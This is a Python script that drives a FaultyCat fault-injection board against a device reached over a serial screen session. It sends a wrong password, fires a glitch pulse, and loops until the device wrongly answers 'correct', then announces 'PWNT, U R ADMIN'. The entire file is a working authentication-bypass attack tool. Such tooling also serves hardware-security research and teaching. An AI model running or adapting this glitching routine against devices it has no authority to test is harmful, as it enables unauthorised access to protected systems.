import sys
import time
import pexpect # Required to handle screen sessions
import threading
from Modules import Worker
# Serial port passed to faulty_worker.set_serial_port() by faulty().
DEFAULT_COMPORT = "/dev/ttyACM0"
# Name of the existing screen session that initialize_child() attaches to with
# `screen -x`. Replace this with the actual screen session name.
SCREEN_NAME = "ttyUSB0_screen"
# Module-wide FaultyWorker instance; the functions below talk to the board
# through its board_uart and board_configurator attributes.
faulty_worker = Worker.FaultyWorker()
# Latest verdict recorded by read_screen_output(); None until one is seen.
device_response = None
# pexpect handle for the screen session; assigned by initialize_child().
child = None
def initialize_child():
    """Attach to the screen session and publish the handle as the global ``child``.

    Spawns ``screen -x SCREEN_NAME`` with UTF-8 decoding, then runs a
    one-second ``expect`` whose only pattern is ``pexpect.TIMEOUT`` so that
    output already pending in the session is consumed before real traffic
    starts.
    """
    global child
    attach_command = f'screen -x {SCREEN_NAME}'
    session = pexpect.spawn(attach_command, encoding='utf-8')
    child = session
    # Expecting TIMEOUT itself means "read whatever arrives for one second and
    # then carry on" -- intended to clear out any pre-existing buffer.
    session.expect(pexpect.TIMEOUT, timeout=1)
def send_test_message_and_read_response():
    """Send 'ping' to the screen session and report whether 'pong' comes back.

    After a short settling delay, output is accumulated for up to two seconds.
    A single ``read_nonblocking`` call returns as soon as *any* data is
    available, so one read may contain only part of the reply (for example
    just the echoed command); accumulating avoids missing a 'pong' that
    arrives slightly later.

    Returns:
        bool: True if 'pong' appeared in the output, False if something else
        (or nothing) was received before the deadline.

    Note:
        Only ``pexpect.exceptions.TIMEOUT`` is handled here; any other error
        raised while reading propagates to the caller.
    """
    # Send 'ping' to the screen session
    child.sendline("ping")
    sys.stdout.write("\rSent 'ping' to screen session.")
    sys.stdout.flush()

    # Wait a bit to ensure the command is processed
    time.sleep(0.5)

    received = ""
    deadline = time.monotonic() + 2
    try:
        while True:
            remaining = deadline - time.monotonic()
            if remaining <= 0:
                break
            # Read up to 1024 characters of new data, waiting at most until
            # the overall deadline.
            received += child.read_nonblocking(size=1024, timeout=remaining)
            if "pong" in received:
                sys.stdout.write("\rReceived 'pong' response.")
                sys.stdout.flush()
                return True
    except pexpect.exceptions.TIMEOUT:
        # Nothing more arrived before the deadline; judge what we have below.
        pass

    if received:
        sys.stdout.write(f"\rReceived unexpected response: {received}")
    else:
        sys.stdout.write("\rNo response received from the screen session (timeout).")
    sys.stdout.flush()
    return False
# Text sent to the device by send_pulse_and_check_response() (presumably a
# deliberately wrong password). It contains the substring "correct", so an
# echo of it must never be mistaken for the device's verdict.
_PASSWORD_GUESS = "incorrectPassword"


def read_screen_output():
    """Read the screen session line by line until the device gives a verdict.

    Runs in a worker thread. As soon as a complete line contains a verdict,
    the global ``device_response`` is set to ``'incorrect'`` or ``'correct'``
    and the function returns. It deliberately does NOT exit the program
    itself: ``sys.exit()`` raised in a non-main thread only ends that thread,
    so reacting to the verdict is left to the caller in the main thread.

    Any echo of the sent password guess is removed from a line before it is
    classified, and "incorrect" is tested before "correct" because the latter
    is a substring of the former.

    A read timeout (2 s without data) or any other read error is reported on
    stdout and ends the function with ``device_response`` left unchanged.
    """
    global device_response
    buffer = ""  # Holds received text that does not yet end in a newline
    try:
        while True:
            # Read up to 1024 characters of new data
            buffer += child.read_nonblocking(size=1024, timeout=2)
            # Process every complete line currently in the buffer
            while "\n" in buffer:
                line, buffer = buffer.split("\n", 1)
                line = line.strip()
                # Ignore the terminal echo of what we typed ourselves.
                verdict_text = line.replace(_PASSWORD_GUESS, "").strip()
                if not verdict_text:
                    continue
                if "incorrect" in verdict_text:
                    device_response = 'incorrect'
                    return
                if "correct" in verdict_text:
                    device_response = 'correct'
                    return
                sys.stdout.write(f"\rReceived unexpected response: {line}")
                sys.stdout.flush()
    except pexpect.exceptions.TIMEOUT:
        sys.stdout.write("\rNo response received from the screen session (timeout).")
        sys.stdout.flush()
    except Exception as e:
        sys.stdout.write(f"\rError reading from screen session: {e}")
        sys.stdout.flush()


def _disarm_and_exit():
    """Announce success, disarm and close the board, then exit with status 0.

    Must be called from the main thread so that ``sys.exit`` actually
    terminates the program.
    """
    sys.stdout.write("\nReceived 'correct' response.\n PWNT, U R ADMIN\n Disarming the device and exiting...\n")
    sys.stdout.flush()
    # Disarm the board
    faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8"))
    faulty_worker.board_uart.close()
    # Exit the program
    sys.exit(0)


def send_pulse_and_check_response():
    """Send the password guess, fire one pulse, and wait for the device's verdict.

    The verdict is collected by ``read_screen_output`` in a worker thread that
    is joined before this function continues. If the device answered
    'correct', the board is disarmed and the program exits (``SystemExit``
    is raised from the main thread).

    Returns:
        bool: False whenever the function returns normally (verdict was
        'incorrect', missing, or an error occurred).

    Raises:
        SystemExit: when the device reported 'correct'.
    """
    global device_response
    # Forget the verdict of any previous attempt so it cannot be re-used.
    device_response = None
    try:
        # Send the password guess to the screen session
        sys.stdout.write("\rSending 'incorrectPassword' to screen session.")
        sys.stdout.flush()
        child.sendline(_PASSWORD_GUESS)
        time.sleep(0.35)

        # Send 'pulse' command (triggers the pulse on the board)
        faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_PULSE.value.encode("utf-8"))
        sys.stdout.write("\rSent pulse...")
        sys.stdout.flush()

        # Read the screen output in a separate thread and wait for it to finish
        reader_thread = threading.Thread(target=read_screen_output)
        reader_thread.start()
        reader_thread.join()
    except Exception as e:
        sys.stdout.write(f"\rError interacting with screen session during pulse: {e}")
        sys.stdout.flush()
        return False

    if device_response == 'correct':
        _disarm_and_exit()
    return False
def start_faulty_attack():
    """Arm the FaultyCat, run the ping/pulse loop, and always clean up.

    Sequence: attach to the screen session, open the board UART, send
    DISARM then ARM, and run up to 5 rounds. Each round first checks that the
    target answers 'ping'; if it does, up to 3 pulse attempts are made.

    Errors are reported on stdout rather than raised. Whatever happens after
    the UART was opened (normal completion, an error, or an exit request),
    the ``finally`` clause tries to disarm the board and close the UART so the
    board is not left armed, and then closes the screen session handle.
    """
    global child
    uart_opened = False
    try:
        # Initialize the child process for screen session
        initialize_child()

        # Open FaultyCat connection
        faulty_worker.board_uart.open()
        uart_opened = True
        time.sleep(0.1)
        sys.stdout.write("\rBoard connected.\n")
        sys.stdout.flush()

        # Arming the board (disarm first, then arm)
        sys.stdout.write("\r[*] ARMING BOARD, BE CAREFUL!\n")
        sys.stdout.flush()
        faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8"))
        time.sleep(1)
        faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_ARM.value.encode("utf-8"))
        sys.stdout.write("\r[*] ARMED BOARD.\n")
        sys.stdout.flush()
        time.sleep(1)

        # Sending pulses and checking responses in a loop (up to 5 times)
        max_iterations = 5
        for i in range(max_iterations):
            sys.stdout.write(f"\rLoop {i+1}/{max_iterations}: Sending pulse and checking response.\n")
            sys.stdout.flush()

            # Only pulse when the target is alive and answers the ping
            if send_test_message_and_read_response():
                max_iterations_2 = 3
                for _ in range(max_iterations_2):
                    # Send pulse and check for correct/incorrect response
                    if send_pulse_and_check_response():
                        break  # Break the loop if 'correct!' is received

            # Small delay before next iteration
            # NOTE(review): indentation was lost in the original; this delay is
            # assumed to belong to the outer loop -- confirm.
            time.sleep(1)
    except Exception as e:
        sys.stdout.write(f"\rError: {e}\n")
        sys.stdout.flush()
    finally:
        if uart_opened:
            # Best-effort: never leave the board armed, even after an error.
            sys.stdout.write("\rDISARMING BOARD. \n")
            sys.stdout.flush()
            try:
                faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8"))
                faulty_worker.board_uart.close()
                sys.stdout.write("\rBOARD DISARMED.\n")
            except Exception as e:
                # The UART may already have been closed elsewhere.
                sys.stdout.write(f"\rCould not disarm/close the board during cleanup: {e}\n")
            sys.stdout.flush()
        # Make sure to clean up the child process
        if child:
            child.close()
def faulty():
    """Point the FaultyWorker at the default serial port and launch the attack.

    Prints the port in use, validates the serial connection, and either
    starts the attack or reports that the connection could not be established.
    """
    port = DEFAULT_COMPORT
    print("Configuring the FaultyCat...")
    print(f"Using serial port: {port}")

    faulty_worker.set_serial_port(port)

    # Only start pulsing once the worker confirms the serial link.
    if faulty_worker.validate_serial_connection():
        start_faulty_attack()
    else:
        print(f"Error: Could not establish connection on: {port}")
if __name__ == "__main__":
    # Script entry point: announce start-up, then configure and run the attack.
    print("Starting FaultyCat...")
    faulty()